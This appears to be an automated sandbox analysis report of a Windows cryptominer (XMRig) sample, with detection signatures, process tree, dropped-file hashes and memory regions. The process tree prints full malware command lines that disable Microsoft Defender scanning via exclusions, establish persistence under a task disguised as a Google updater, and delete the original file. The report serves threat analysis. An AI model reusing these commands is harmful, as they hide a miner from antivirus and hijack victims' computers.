Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1800s
  • max time network
    1791s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Y2JYGshMHJGuGREA.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 31 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe
    "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    PID:2388
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1396
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1744
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:2732
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4928
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:3520
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2000
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4472
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:4972
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:1924
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe qtdiqnkejoz
              2⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Suspicious behavior: EnumeratesProcesses
              PID:3776
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3852
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:4588
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:2368

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            1.2MB

            MD5

            ae916474f629a2550079c7382b51877d

            SHA1

            81ff30feb1fa5fca34b952b1191d04cb040b1d2d

            SHA256

            e2e91eb4e7ab0bbcedde87c8ecaaaa0680ee11b4ce31f3201ebec10f24bf2896

            SHA512

            99b3a397e5d244cf12ee995981ada84694eb4b3e1e2eac8132bf72ac2e72adac1ff98647c865bf04758666fcbae65be1f218342c0cfd518b7825657bdaa2fb8c

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            461KB

            MD5

            1418de7327001eeb4a0bb3ca849883c5

            SHA1

            d4a1dda51c5fb2d1929f2ed816ed4b4a02b04d7f

            SHA256

            8c213308e1b56a28e9ff23c4a0bb0fc2c8cfa749800bb73ea086e2de5813d6df

            SHA512

            0e5f50aca624b9e904b1d100f3464d910921cb96982ab469b3daf892d48181be9efb9fa3b4573b75728d0616da46c2b0b46fc4b820c0fe0f24d2979a3122db5c

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            6d42b6da621e8df5674e26b799c8e2aa

            SHA1

            ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

            SHA256

            5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

            SHA512

            53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e8e3af4111b4dbc5678a7a1374968c03

            SHA1

            80bc9516932accbef00602356fbca65a9bb2879c

            SHA256

            67946f37b2a5c6588b7b133996d7c00646e9ef8d01ffe2d34c7cd5627613aa5a

            SHA512

            853b8c30b544a7ceb84cae119883af3cf75880a3d21ec0fb5ff16464a202ea167b96fad6a62137906ad31b5b9ad4445cb083d45ea6d0f2f2127222ca389b2ebf

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qx2js52v.oww.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1396-32-0x00007FFBC9500000-0x00007FFBC9FC1000-memory.dmp
            Filesize

            10.8MB

          • memory/1396-18-0x00007FFBC9500000-0x00007FFBC9FC1000-memory.dmp
            Filesize

            10.8MB

          • memory/1396-30-0x0000025CED110000-0x0000025CED120000-memory.dmp
            Filesize

            64KB

          • memory/1396-19-0x0000025CED110000-0x0000025CED120000-memory.dmp
            Filesize

            64KB

          • memory/1564-16-0x00007FFBC9500000-0x00007FFBC9FC1000-memory.dmp
            Filesize

            10.8MB

          • memory/1564-13-0x0000021173090000-0x00000211730A0000-memory.dmp
            Filesize

            64KB

          • memory/1564-12-0x0000021173090000-0x00000211730A0000-memory.dmp
            Filesize

            64KB

          • memory/1564-11-0x00007FFBC9500000-0x00007FFBC9FC1000-memory.dmp
            Filesize

            10.8MB

          • memory/1564-6-0x000002115AAB0000-0x000002115AAD2000-memory.dmp
            Filesize

            136KB

          • memory/1924-163-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-145-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-175-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-173-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-171-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-169-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-167-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-165-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-130-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-161-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-159-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-157-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-155-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-153-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-151-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-149-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-147-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-179-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-181-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-177-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-143-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-141-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-139-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-137-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-135-0x0000019978940000-0x0000019978960000-memory.dmp
            Filesize

            128KB

          • memory/1924-134-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-118-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-117-0x0000019978330000-0x0000019978350000-memory.dmp
            Filesize

            128KB

          • memory/1924-183-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-185-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-122-0x0000019978900000-0x0000019978920000-memory.dmp
            Filesize

            128KB

          • memory/1924-132-0x0000019978920000-0x0000019978940000-memory.dmp
            Filesize

            128KB

          • memory/1924-124-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-125-0x0000019978920000-0x0000019978940000-memory.dmp
            Filesize

            128KB

          • memory/1924-126-0x0000019978940000-0x0000019978960000-memory.dmp
            Filesize

            128KB

          • memory/1924-128-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/1924-131-0x00007FF7F2F90000-0x00007FF7F3784000-memory.dmp
            Filesize

            8.0MB

          • memory/2000-62-0x00000200EE9B0000-0x00000200EE9C0000-memory.dmp
            Filesize

            64KB

          • memory/2000-78-0x00000200F1000000-0x00000200F101A000-memory.dmp
            Filesize

            104KB

          • memory/2000-52-0x00007FFBC9440000-0x00007FFBC9F01000-memory.dmp
            Filesize

            10.8MB

          • memory/2000-72-0x00000200F0DA0000-0x00000200F0DBC000-memory.dmp
            Filesize

            112KB

          • memory/2000-73-0x00000200EE9B0000-0x00000200EE9C0000-memory.dmp
            Filesize

            64KB

          • memory/2000-74-0x00000200F0DC0000-0x00000200F0E75000-memory.dmp
            Filesize

            724KB

          • memory/2000-75-0x00000200F0B30000-0x00000200F0B3A000-memory.dmp
            Filesize

            40KB

          • memory/2000-76-0x00000200F0FC0000-0x00000200F0FDC000-memory.dmp
            Filesize

            112KB

          • memory/2000-77-0x00000200F0B40000-0x00000200F0B4A000-memory.dmp
            Filesize

            40KB

          • memory/2000-79-0x00000200F0B50000-0x00000200F0B58000-memory.dmp
            Filesize

            32KB

          • memory/2000-85-0x00007FFBC9440000-0x00007FFBC9F01000-memory.dmp
            Filesize

            10.8MB

          • memory/2000-82-0x00000200EE9B0000-0x00000200EE9C0000-memory.dmp
            Filesize

            64KB

          • memory/2000-81-0x00000200F0FF0000-0x00000200F0FFA000-memory.dmp
            Filesize

            40KB

          • memory/2000-80-0x00000200F0FE0000-0x00000200F0FE6000-memory.dmp
            Filesize

            24KB

          • memory/2388-0-0x00007FF7D1DD0000-0x00007FF7D1FE1000-memory.dmp
            Filesize

            2.1MB

          • memory/2388-34-0x00007FF7D1DD0000-0x00007FF7D1FE1000-memory.dmp
            Filesize

            2.1MB

          • memory/3776-129-0x00007FF61D650000-0x00007FF61D666000-memory.dmp
            Filesize

            88KB

          • memory/3776-123-0x00007FF61D650000-0x00007FF61D666000-memory.dmp
            Filesize

            88KB

          • memory/3852-51-0x00007FF6C9D30000-0x00007FF6C9F41000-memory.dmp
            Filesize

            2.1MB

          • memory/3852-116-0x00007FF6C9D30000-0x00007FF6C9F41000-memory.dmp
            Filesize

            2.1MB

          • memory/4472-110-0x000001D3EA270000-0x000001D3EA280000-memory.dmp
            Filesize

            64KB

          • memory/4472-112-0x00007FFBC9440000-0x00007FFBC9F01000-memory.dmp
            Filesize

            10.8MB

          • memory/4472-109-0x000001D3EA270000-0x000001D3EA280000-memory.dmp
            Filesize

            64KB

          • memory/4472-99-0x000001D3EA270000-0x000001D3EA280000-memory.dmp
            Filesize

            64KB

          • memory/4472-98-0x000001D3EA270000-0x000001D3EA280000-memory.dmp
            Filesize

            64KB

          • memory/4472-97-0x00007FFBC9440000-0x00007FFBC9F01000-memory.dmp
            Filesize

            10.8MB

          • memory/4928-50-0x00007FFBC9500000-0x00007FFBC9FC1000-memory.dmp
            Filesize

            10.8MB

          • memory/4928-35-0x00007FFBC9500000-0x00007FFBC9FC1000-memory.dmp
            Filesize

            10.8MB

          • memory/4928-36-0x0000020940480000-0x0000020940490000-memory.dmp
            Filesize

            64KB

          • memory/4928-46-0x0000020940480000-0x0000020940490000-memory.dmp
            Filesize

            64KB